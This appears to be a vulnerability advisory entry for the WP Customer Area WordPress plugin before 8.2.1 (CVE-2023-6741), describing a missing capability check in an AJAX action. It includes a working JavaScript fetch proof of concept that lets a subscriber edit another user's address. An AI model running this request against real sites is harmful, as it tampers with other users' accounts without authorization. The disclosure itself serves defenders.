Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:9DEBE1EA-18AD-44C4-8078-68EB66D36C4AHistoryJan 10, 2024 - 12:00 a.m.
WP Customer Area < 8.2.1 - Subscriber+ Account Address Update
2024-01-1000:00:00
Krzysztof Zając (CERT PL)
58
wp customer area
subscriber
account
address update
nonce
fetch
post request
exploit
Description The plugin does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users’ account address.
You may get the nonce from *your* save address form
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
},
"body": 'action=cuar_save_address_for_owner&cuar_nonce=a73a7eab3b&owner[type]=usr&owner[ids][]=1&address_id=home_address&address[name]=hohohohoh',
"method": "POST",
"mode": "cors",
"credentials": "include"
})
.then((response) => {
return response.text();
})
.then((data) => {
console.log(data);
});Related
wpvulndb
wpvulndb
WP Customer Area < 8.2.1 - Subscriber+ Account Address Update
2024-01-10 00:00:00
prion
prion
Code injection
2024-01-16 16:15:00
nvd
nvd
CVE-2023-6741
2024-01-16 16:15:13
cve
cve
CVE-2023-6741
2024-01-16 16:15:13
cvelist
cvelist
CVE-2023-6741 WP Customer Area < 8.2.1 - Subscriber+ Account Address Update
2024-01-16 15:56:59
AI Score
4.7
Confidence
High
EPSS
0
Percentile
14.0%
Related for WPEX-ID:9DEBE1EA-18AD-44C4-8078-68EB66D36C4A